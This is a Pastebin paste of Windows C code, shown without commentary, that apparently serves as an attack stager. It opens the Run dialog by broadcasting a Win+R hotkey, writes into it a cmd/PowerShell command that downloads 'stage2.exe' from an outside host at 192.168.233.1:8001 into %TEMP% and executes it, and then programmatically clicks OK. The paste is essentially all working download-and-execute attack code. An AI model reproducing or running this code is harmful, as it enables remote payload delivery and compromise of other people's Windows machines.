Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #define UNICODE
- #define _UNICODE
- #include <windows.h>
- #include <tchar.h>
- #pragma comment( lib, "user32" )
- int _tmain( int argc, TCHAR *argv[] )
- {
- HDESK hDesktop;
- HMODULE hExplorer;
- HANDLE hWnd, hComboBox, hEdit, hOkButton;
- TCHAR szRunDlgTitle[MAX_PATH];
- hDesktop = OpenDesktop( _T( "Default"),
- 0,
- FALSE,
- MAXIMUM_ALLOWED );
- if ( NULL == hDesktop )
- {
- _tprintf( _T( "[-] OpenDesktop() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- if ( FALSE == SetThreadDesktop ( hDesktop ) )
- {
- _tprintf( _T( "[-] SetThreadDesktop() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- hExplorer = LoadLibraryEx( _T( "explorer.exe" ),
- 0,
- LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE );
- if ( NULL == hExplorer )
- {
- _tprintf( _T( "[-] LoadLibrary() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- if ( 0 == LoadString( hExplorer,
- 722,
- szRunDlgTitle,
- _countof( szRunDlgTitle ) ) )
- {
- _tprintf( _T( "[-] LoadString() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- SendMessage( HWND_BROADCAST,
- WM_HOTKEY,
- 500,
- MAKELONG( MOD_WIN, 'R' ) );
- do
- {
- hWnd = FindWindow( WC_DIALOG,
- szRunDlgTitle );
- }
- while ( NULL == hWnd );
- hComboBox = GetDlgItem( hWnd, 12298 );
- if ( NULL == hComboBox )
- {
- _tprintf( _T( "[-] GetDlgItem() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- hEdit = GetDlgItem( hComboBox, 1001 );
- if ( NULL == hEdit )
- {
- _tprintf( _T( "[-] GetDlgItem() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- hOkButton = GetDlgItem( hWnd, 1 );
- if ( NULL == hOkButton )
- {
- _tprintf( _T( "[-] GetDlgItem() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- SendMessage( hEdit,
- WM_SETTEXT,
- 0,
- ( LPARAM )_T( "cmd.exe /c \"cd %TEMP%&PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.233.1:8001/stage2.exe','stage2.exe');(New-Object -com Shell.Application).ShellExecute('stage2.exe');\"" ) );
- if ( FALSE == IsWindowEnabled( hOkButton ) )
- {
- EnableWindow( hOkButton, TRUE );
- }
- SendMessage( hOkButton,
- BM_CLICK,
- 0,
- 0 );
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement